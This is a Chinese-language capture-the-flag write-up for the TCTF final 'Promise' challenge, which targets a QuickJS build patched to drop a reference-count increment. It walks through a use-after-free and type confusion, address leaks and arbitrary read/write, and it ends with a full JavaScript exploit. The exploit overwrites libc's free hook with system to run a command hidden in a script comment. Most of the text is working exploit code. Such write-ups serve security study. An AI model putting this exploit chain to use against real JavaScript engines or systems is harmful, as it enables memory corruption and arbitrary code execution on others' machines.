TCTF-final-Promise-JSpwn题解

TCFT-final 题量很多，难度很大，做得头痛。有一道JS引擎的pwn，刚好最近才开始入门v8，所以就和ver哥研究了一天。有点遗憾，比AAA的师傅晚一点点出，没拿一血。好像，QWB的kernel题当时也是比AAA的师傅晚一点点，没拿二血，缘分23333.

漏洞分析

题目给了diff文件，漏洞点能很快找到：

diff --git a/deps/quickjs/src/quickjs.c b/deps/quickjs/src/quickjs.c
index a39ff8f..4af672c 100644
--- a/deps/quickjs/src/quickjs.c
+++ b/deps/quickjs/src/quickjs.c
@@ -46175,7 +46175,8 @@ static void fulfill_or_reject_promise(JSContext *ctx, JSValueConst promise,

     if (!s || s->promise_state != JS_PROMISE_PENDING)
         return; /* should never happen */
-    set_value(ctx, &s->promise_result, JS_DupValue(ctx, value));
+    

     s->promise_state = JS_PROMISE_FULFILLED + is_reject;
 #ifdef DUMP_PROMISE
     printf("fulfill_or_reject_promise: is_reject=%d\n", is_reject);

可以看到只对fulfill_or_reject_promise函数的set_value函数进行了修改，原本是是执行了JS_DupValue(ctx, value)，将其修改为了value。

题目还给了commit:0a533445f256fb3a628371e24705d3a2532f60f1，把项目拖下来看源码。

JS_Dupvalue如下：

static inline JSValue JS_DupValue(JSContext *ctx, JSValueConst v)
{
    if (JS_VALUE_HAS_REF_COUNT(v)) {
        JSRefCountHeader *p = (JSRefCountHeader *)JS_VALUE_GET_PTR(v);
        p->ref_count++;
    }
    return (JSValue)v;
}

可以看到，他是将我们传入的值的引用指针取到，然后将引用数 +1，然后将值返回。这里解释很简单，就是 JS每次取值、赋值操作，都代表着对这个值的引用，他会将引用数加1。

而我们patch后，就是在执行这个函数的赋值时，这个值的引用数不会被加1。

我们接着看一下set_value:

/* set the new value and free the old value after (freeing the value
   can reallocate the object data) */
static inline void set_value(JSContext *ctx, JSValue *pval, JSValue new_val)
{
    JSValue old_val;
    old_val = *pval;
    *pval = new_val;
    JS_FreeValue(ctx, old_val);
}

功能也很简单，就是将一个新的值赋值到对象。这里首先会将旧值保存，然后赋新值，最后对旧值执行JS_FreeValue操作：

static inline void JS_FreeValue(JSContext *ctx, JSValue v)
{
    if (JS_VALUE_HAS_REF_COUNT(v)) {
        JSRefCountHeader *p = (JSRefCountHeader *)JS_VALUE_GET_PTR(v);
        if (--p->ref_count <= 0) {
            __JS_FreeValue(ctx, v);
        }
    }
}

JS_FreeValue操作，首先会将值的引用指针拿到，将该指针减一后，判断该引用数是否小于等于0，若成立，则意味着该值已经没有被引用，所以会调用_JS_FreeValue释放掉这个值。

漏洞总结

所以，这里总结一下，其实就是一个UAF漏洞。

我们将一个值x，首先赋值给r1对象，此时x.ref_count = 1。然后再通过漏洞函数赋值给promise对象，此时x.ref_count = 1。最后我们给promise对象赋新值，那么x.ref_count =0，所以x的地址就会被释放掉。但是，我们的r1仍然指向x的地址。所以，就存在一个UAF漏洞。

漏洞利用

V8里常见的利用思路，是实现类型混淆，通过将同一块内存混淆成不同的类型，那么通过不同的类型就能实现对这块内存的不同操作。

这里，我们的利用思路，总体来说也是类型混淆。然后找到一篇解释很详细的quickJS的UAF漏洞的介绍文章：QuickJS uaf 漏洞分析

下面的利用思路，基本就是按照这篇文章实现的。

Double free实现JSString和JSArrayBuffer混淆

首先，构造了一个目标对象：

a = [
    [0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    ], 1, 2, 3, 4
];

a是一个数组对象，a[0]也是一个数组对象，结构体如下所示，会申请一个 0x51的堆块来存储这个对象。该结构体最后存储的是value数据地址。

667 struct JSObject {
  668     JSRefCountHeader header; /* must come first, 32-bit */
  669     JSGCHeader gc_header; /* must come after JSRefCountHeader, 8-bit */
  670     uint8_t extensible : 1;
  671     uint8_t free_mark : 1; /* only used when freeing objects with cycles */
  672     uint8_t is_exotic : 1; /* TRUE if object has exotic property handlers */
  673     uint8_t fast_array : 1; /* TRUE if u.array is used for get/put */
  674     uint8_t is_constructor : 1; /* TRUE if object is a constructor function */
  675     uint8_t is_uncatchable_error : 1; /* if TRUE, error is not catchable */
  676     uint8_t is_class : 1; /* TRUE if object is a class constructor */
  677     uint8_t tmp_mark : 1; /* used in JS_WriteObjectRec() */
  678     uint16_t class_id; /* see JS_CLASS_x */
  679     /* byte offsets: 8/8 */
  680     struct list_head link; /* object list */
  681     /* byte offsets: 16/24 */
  682     JSShape *shape; /* prototype and property names + flag */
  683     JSProperty *prop; /* array of properties */
  684     /* byte offsets: 24/40 */
  685     struct JSMapRecord *first_weak_ref; /* XXX: use a bit and an external hash table? */
  686     /* byte offsets: 28/48 */
  687     union {
                ....
                ....
                ...
          }

大概如下所示：

然后，我们将a[0]赋值给refcopy，此时a[0]对象的ref_count变为2。

console.log("grabbing reference to target");
refcopy = a[0];

然后，去触发漏洞函数。我们将a[0]赋值给Promise对象，此时a[0]的ref_count仍然为 2。然后对Promise对象重新赋值为1，此时a[0]的ref_count计数变为 1。

console.log("triggering bug");
var p = Promise.resolve(a[0]);
p = 1;

接下来就是去实现 JSString和JSObject类型混淆。

console.log("freeing target twice and overlaping JSString and JSObject");
a[0] = 0x61616161;
refill_0 = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.slice(1);
refcopy = 0;

refill_1 = [0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
];

首先将a[0]重新赋值为数字，那么此时原本的数组对象的ref_count会变为0，那么这个对象就会被释放。这里会释放出两个堆块，第一个堆块是 0x51的JSArrayBuffer结构体，另一个是存储数据的data结构体，这里大小取决于我们输入的数据。

接着，将refill_0赋值为一个字符串，这里输入的字符数为0x37个。那么此时就会生成JSString对象，结构体如下：

384 struct JSString {
  385     JSRefCountHeader header; /* must come first, 32-bit */
  386     uint32_t len : 31;
  387     uint8_t is_wide_char : 1; /* 0 = 8 bits, 1 = 16 bits characters */
  388     uint32_t hash : 30;
  389     uint8_t atom_type : 2; /* != 0 if atom, JS_ATOM_TYPE_x */
  390     uint32_t hash_next; /* atom_index for JS_ATOM_TYPE_SYMBOL */
  391 #ifdef DUMP_LEAKS
  392     struct list_head link; /* string list */
  393 #endif
  394     union {
  395         uint8_t str8[0]; /* 8 bit strings will get an extra null terminator */
  396         uint16_t str16[0];
  397     } u;
  398 };

这里JSSting堆块根据调试前0x10是 各种变量，从0x10开始是我们的数据，如下所示：

那么这里refill_0会申请一个0x37+0x10的堆块，也就是0x51的堆块。那么这里就能将我们之前释放的a[0]对空间取到，这里称为chunk0，不过此时chunk0是JSString对象。

然后再将refcopy = 0，由于此时refcopy仍然指向a[0]数组地址，所以其也会释放a[0]，也就是又会产生chunk0的空闲堆块。

然后对refill_1赋值为与a[0]相同大小的数组值，那么此时refill_1也会申请一个0x51的堆块来存储JSObject结构体。那么这里就可以将chunk0再次分配出来，此时对于refill_1其为JSObject对象。

总结：我们现在对chunk0实现了JSString和JSArrayBuffer的混淆。那么，后续我们就可以通过refill_0和refill_1实现不同的操作。

泄漏地址

接下来，我们就可以利用类型混淆去泄漏地址。

console.log("leaking JSObject data");
// Parses the string into a bunch of uint32s
for (var i = 0; i < 0x38; i += 4) {
    var ptr = 0;
    var val = '';
    ptr = refill_0.slice(i, i + 4);

    for (var j = 3; j >= 0; j--) {
        var char = ptr.charCodeAt(j).toString(16);
        if (char.length == 1)
            char = '0' + char;
        val += char;
    }
    val = parseInt(val, 16);
    jsobj_leak_data[i / 4] = val;
}

var shape = toint64(jsobj_leak_data[(24 - 0x10) / 4], jsobj_leak_data[(28 - 0x10) / 4]);
var prop = toint64(jsobj_leak_data[(32 - 0x10) / 4], jsobj_leak_data[(36 - 0x10) / 4]);
var values = toint64(jsobj_leak_data[(56 - 0x10) / 4], jsobj_leak_data[(60 - 0x10) / 4]);

console.log("shape @ " + shape.toString(16));
console.log("prop @ " + prop.toString(16));
console.log("values @ " + values.toString(16));

如果我们输出refill_0的值，其会输出chunk1+0x10开始处的数据。而这些地址此时存储的是refill_1的JSObject对象地址。我们可以依次输出shape、prop和values 地址。

JSArrayBuffer和JSObject混淆

这里最开始的思路是，想前面都已经实现JSString和JSObject混淆了，直接通过JSString去修改JSObject对象的value指针，实现一个写。但是这里有一个问题： 修改一个JSString对象，并不会直接在原堆块上修改数据，而是会重新申请一个结构体堆块。

然后，想的是再构造一次混淆，直接去修改value指针，这里经过尝试也不行。因为我们的JSString只能对chunk1+0x10开始的数据可控，其会将chunk1的前0x10改为非法，那么后面执行JSObject时会报错。

所以，这里最后选择JSArrayBuffer和JSObject混淆。

console.log("freeing target twice and refilling with two JSObjects");

refill_1 = 0;
refill_1 = [0x13371337];

refill_0 = 0;
refill_0 = [0x71718181];

var x2 = 0x1000000;
while(x2){
 x2 -= 1;
}


em1 = new Uint32Array(0x48 / 4);
refill_1.fill(0x51515151);
em1 = 0;

console.log("freeing object again and refilling with ArrayBuffer data");
refill_1 = 0;

// Need to free other JSObject size things as well to cause the
// data to overlap and not the JSObject of the ArrayBuffer
x = 0;
y = 0;

refill_1 = new Uint32Array(0x48 / 4);
refill_1.fill(0x41414141);

console.log("crafting JSObject with values pointing to spray buffer data");
jsobj_leak_data[(56 - 0x10) / 4] += 0x2000;
overlap_addr = values + 0x2000;

for (var i = 4; i < 0x48 / 4; i++) {
    refill_1[i] = jsobj_leak_data[i - 4];
}
refill_1[0] = 0x51414141;
refill_1[1] = 0x00020d00;
refill_1[2] = 0x41414141;
refill_1[3] = 0x41414141;
console.log("new values @ " + overlap_addr.toString(16)+" da: "+refill_1[0].toString(16));

首先将refill_0重新赋值为一个数组对象，此时会将chunk1释放掉再申请回来。再将refill_1重新赋值为一个数组对象，此时会将chunk1再释放并申请回来。

然后接着构造一个Uint32Array数组，大小为 0x48，那么会申请一个0x51的堆块来存储数组内容。再释放掉，这里是我调试时，发现后续对chunk1利用时，从tcache取出会出错，所以放了一个0x51堆块到tcache占位。

接着，将refill_1 = 0，此时会释放掉chunk1。

然后对chunk1申请Uint32Array，大小为 0x48，此时就会将我们释放的chunk1取回来，当作JSArrayBuffer，即数组的数据存储空间。

那么现在就相当于，chunk1对于refill_0是作为JSObject对象，而对于refill_1是作为JSArrayBuffer。那么后续通过修改refil_1的值就能去修改chunk1。

这里我们就将其伪造，修改JSObject.value指针到我们前面泄漏的value+0x2000处。

为什么修改到这里，我们下面解释。

addressOf

在开头，我们就通过堆喷，创建了一大堆spray数组。我们上面修改了refill_0的value指针后，其是有可能直接指向spray空间的。

console.log("finding overlap");
refill_0[0] = 0x11223344;  //modify spray value, not modify free addr
//console.log("refill_0[0]: "+refill_0[0].toString(16));
var overlap_buf;
var overlap_index
for (var i = 0; i < spray.length; i++) {
    for (var j = 0; j < (0x1000 / 4); j++) {

        if (spray[i] && spray[i][j] == 0x11223344) {
            overlap_buf = spray[i];
            overlap_index = j;
            console.log("overlap found");
            console.log("spray index = " + i.toString(16));
            console.log("index into buffer = " + j.toString(16));

        }
    }
}

function addrof(obj) {
    refill_0[0] = obj;
    var ret = toint64(overlap_buf[overlap_index], overlap_buf[overlap_index + 1]);
    refill_0[0] = 0;
    return ret;c
}

这里，我们先修改refill_0[0]的值为0x11223344。然后通过在spray中搜索这个值，找到此时refill_0.value具体指到了spray哪里overlap_index。

那么接着就能实现addressOf函数：

1、 我们先将一个对象赋值给refill_0[0]，那么此时该对象的地址会存储到refill_0[0]处；

2、 我们通过读取spray空间，也就能将该地址输出。

任意读写

console.log("crafting master and slave typed arrays");
master_addr = addrof(master);
slave_addr = addrof(slave);
parseFloat_addr = addrof(parseFloat);

console.log("master addr = " + master_addr.toString(16));
console.log("slave addr = " + slave_addr.toString(16));
console.log("parseFloat addr = " + parseFloat_addr.toString(16));

console.log("setting master->values to slave addr");

// Point our crafted JSObject values to the address of master->values
refill_1[(56) / 4] = (master_addr & 0xffffffff) + 56;
refill_0[0] = slave;
//refill_1[(56) / 4] = overlap_addr;

console.log("setting up arb read/write");

function write64(addr, val) {
    master[56 / 4] = (addr & 0xffffffff) >>> 0;
    master[60 / 4] = addr / 0x100000000;

    slave[0] = val & 0xffffffff;
    slave[1] = val / 0x100000000;

}

function read64(addr) {
    master[56 / 4] = (addr & 0xffffffff) >>> 0;
    master[60 / 4] = addr / 0x100000000;

    return slave[1] * 0x100000000 + slave[0];
}

这里任意读写，主要是利用修改master和value两个数组的value指针来实现。和v8类似。

劫持控制流

已经实现任意读写后，就是要做劫持控制流。

var libc_base = read64(values) - 0x3ec2b0;
console.log("libc_base : " + libc_base.toString(16));
write64(libc_base + 0x3ed8e8,libc_base + 0x4f550);
write64(values-0x13cc0,0x2a662f2e);

这里，首先需要泄漏libc地址。因为我们最开始泄漏了一个value堆地址，这个堆块是一个大块，会被放到largbin中，所以读取这个堆块，能够泄漏libc地址。

然后，直接去覆盖free_hook。然后，在一个数组中布置值为/bin/sh。然后去修改该数组的值，就会对这个堆块进行释放。但是这种方法，远程尝试会有问题，因为在执行释放我们的堆块前，程序会释放其他堆块。就会造成执行了一大堆system，报错。

重点：这里最后卡了一个多小时。发现了一个有趣点，就是quickJS是会将我们的代码存储到一个堆块中，执行完我们的代码后，会释放这个堆块。那么在exp的开头处通过注释 写入了|./readflag。最终成功输出flag.

//|./readflag

EXP

//|./readflag
function toint64(low, high) {
    return low + high * 0x100000000;
}

function fromint64(val) {
    return [val & 0xffffffff, val / 0x100000000];
}

/*
function u32tostr(m){
    let r = "";
    for(let i=0 ;i<4; i++){
        r += String.fromCharCode((m >> 8 * i) & 0xff);
    }
    return r;
}
*/
// Global variables we are using
var a;
var refcopy;
var refill_0;
var refill_1;

var spray;

var jsobj_leak_data;

var x;
var y;

var master;
var slave;
var master_addr;
var slave_addr;

var test;
var test_addr;
var fake_test;
var test_values;
var test_values_read;

spray = [];

jsobj_leak_data = new Uint32Array(0x38);
jsobj_leak_data.fill(0);
//em1 = new Uint32Array(0x48 / 4);
//refill_1.fill(0x51515151);

// .slice will allocate a new JSString
x = '|./readflag\x00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.slice(1);
y = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.slice(1);

master = new Uint32Array(0x40);
master.fill(0x31313131);

slave = new Uint32Array(0x40);
slave.fill(0x61616161);

console.log("starting exploit");
console.log("spraying buffers");

for (var i = 0; i < 0x400; i++) {
    var x = new Uint32Array(0x1000 / 4);
    x.fill(0x51515151);
    spray.push(x);
}
console.log("creating holes");
for (var i = 0; i < spray.length; i += 0x4) {
    spray[i] = 0;
}
console.log("placing target");
a = [
    [0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
        0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    ], 1, 2, 3, 4
];

console.log("grabbing reference to target");
refcopy = a[0];

console.log("triggering bug");
var p = Promise.resolve(a[0]);
p = 1;

console.log("freeing target twice and overlaping JSString and JSObject");
a[0] = 0x61616161;
refill_0 = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.slice(1);
refcopy = 0;
/*
var x1 = 0x100000;
while(x1){
 x1 -= 1;
}
*/
refill_1 = [0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
    0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2, 0x2,
];

console.log("leaking JSObject data");
// Parses the string into a bunch of uint32s
for (var i = 0; i < 0x38; i += 4) {
    var ptr = 0;
    var val = '';
    ptr = refill_0.slice(i, i + 4);

    for (var j = 3; j >= 0; j--) {
        var char = ptr.charCodeAt(j).toString(16);
        if (char.length == 1)
            char = '0' + char;
        val += char;
    }
    val = parseInt(val, 16);
    jsobj_leak_data[i / 4] = val;
}

var shape = toint64(jsobj_leak_data[(24 - 0x10) / 4], jsobj_leak_data[(28 - 0x10) / 4]);
var prop = toint64(jsobj_leak_data[(32 - 0x10) / 4], jsobj_leak_data[(36 - 0x10) / 4]);
var values = toint64(jsobj_leak_data[(56 - 0x10) / 4], jsobj_leak_data[(60 - 0x10) / 4]);

console.log("shape @ " + shape.toString(16));
console.log("prop @ " + prop.toString(16));
console.log("values @ " + values.toString(16));
//refill_0='zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'.slice(1);
/*var xc1=0x1000000;
while(xc1){
 xc1 -= 1;
}
*/

console.log("freeing target twice and refilling with two JSObjects");

refill_1 = 0;
refill_1 = [0x13371337];

refill_0 = 0;
refill_0 = [0x71718181];

var x2 = 0x1000000;
while(x2){
 x2 -= 1;
}


em1 = new Uint32Array(0x48 / 4);
refill_1.fill(0x51515151);
em1 = 0;

console.log("freeing object again and refilling with ArrayBuffer data");
refill_1 = 0;

// Need to free other JSObject size things as well to cause the
// data to overlap and not the JSObject of the ArrayBuffer
x = 0;
y = 0;

refill_1 = new Uint32Array(0x48 / 4);
refill_1.fill(0x41414141);

console.log("crafting JSObject with values pointing to spray buffer data");
jsobj_leak_data[(56 - 0x10) / 4] += 0x2000;
overlap_addr = values + 0x2000;

for (var i = 4; i < 0x48 / 4; i++) {
    refill_1[i] = jsobj_leak_data[i - 4];
}
refill_1[0] = 0x51414141;
refill_1[1] = 0x00020d00;
refill_1[2] = 0x41414141;
refill_1[3] = 0x41414141;
console.log("new values @ " + overlap_addr.toString(16)+" da: "+refill_1[0].toString(16));

console.log("10:"+toint64(jsobj_leak_data[10],jsobj_leak_data[11]).toString(16));
//refill_1 = toint64(jsobj_leak_data[0],jsobj_leak_data[1])+toint64(jsobj_leak_data[2],jsobj_leak_data[3]).toString(16)+toint64(jsobj_leak_data[4],jsobj_leak_data[5]).toString(16)+"zzzzzzzzxxxxxxxx"+toint64(jsobj_leak_data[10],jsobj_leak_data[11]).toString(16);//+toint64(jsobj_leak_data[10],jsobj_leak_data[11]).toString(16)+toint64(jsobj_leak_data[12],jsobj_leak_data[13]).toString(16)+toint64(jsobj_leak_data[14],jsobj_leak_data[15]).toString(16)+toint64(jsobj_leak_data[16],jsobj_leak_data[17]).toString(16));//+jsobj_leak_data[8]+jsobj_leak_data[9]+jsobj_leak_data[10]+jsobj_leak_data[11]+jsobj_leak_data[12]+jsobj_leak_data[13]+jsobj_leak_data[14]+jsobj_leak_data[15]+jsobj_leak_data[16]+jsobj_leak_data[17]+jsobj_leak_data[18];
//refill_1 = 'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'.slice(1);


//refill_1 = 'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'.slice(1);

while(x2){
 x2 -= 1;
}

console.log("finding overlap");
refill_0[0] = 0x11223344;  //modify spray value, not modify free addr
//console.log("refill_0[0]: "+refill_0[0].toString(16));
var overlap_buf;
var overlap_index
for (var i = 0; i < spray.length; i++) {
    for (var j = 0; j < (0x1000 / 4); j++) {

        if (spray[i] && spray[i][j] == 0x11223344) {
            overlap_buf = spray[i];
            overlap_index = j;
            console.log("overlap found");
            console.log("spray index = " + i.toString(16));
            console.log("index into buffer = " + j.toString(16));

        }
    }
}

function addrof(obj) {
    refill_0[0] = obj;
    var ret = toint64(overlap_buf[overlap_index], overlap_buf[overlap_index + 1]);
    refill_0[0] = 0;
    return ret;
}


console.log("crafting master and slave typed arrays");
master_addr = addrof(master);
slave_addr = addrof(slave);
parseFloat_addr = addrof(parseFloat);

console.log("master addr = " + master_addr.toString(16));
console.log("slave addr = " + slave_addr.toString(16));
console.log("parseFloat addr = " + parseFloat_addr.toString(16));

console.log("setting master->values to slave addr");

// Point our crafted JSObject values to the address of master->values
refill_1[(56) / 4] = (master_addr & 0xffffffff) + 56;
refill_0[0] = slave;
//refill_1[(56) / 4] = overlap_addr;

console.log("setting up arb read/write");

function write64(addr, val) {
    master[56 / 4] = (addr & 0xffffffff) >>> 0;
    master[60 / 4] = addr / 0x100000000;

    slave[0] = val & 0xffffffff;
    slave[1] = val / 0x100000000;

}

function read64(addr) {
    master[56 / 4] = (addr & 0xffffffff) >>> 0;
    master[60 / 4] = addr / 0x100000000;

    return slave[1] * 0x100000000 + slave[0];
}

/*
console.log("jumping to 0x41414141");

console.log("DONE");
*/
var libc_base = read64(values) - 0x3ec2b0;
console.log("libc_base : " + libc_base.toString(16));
write64(libc_base + 0x3ed8e8,libc_base + 0x4f550);
write64(values-0x13cc0,0x2a662f2e);


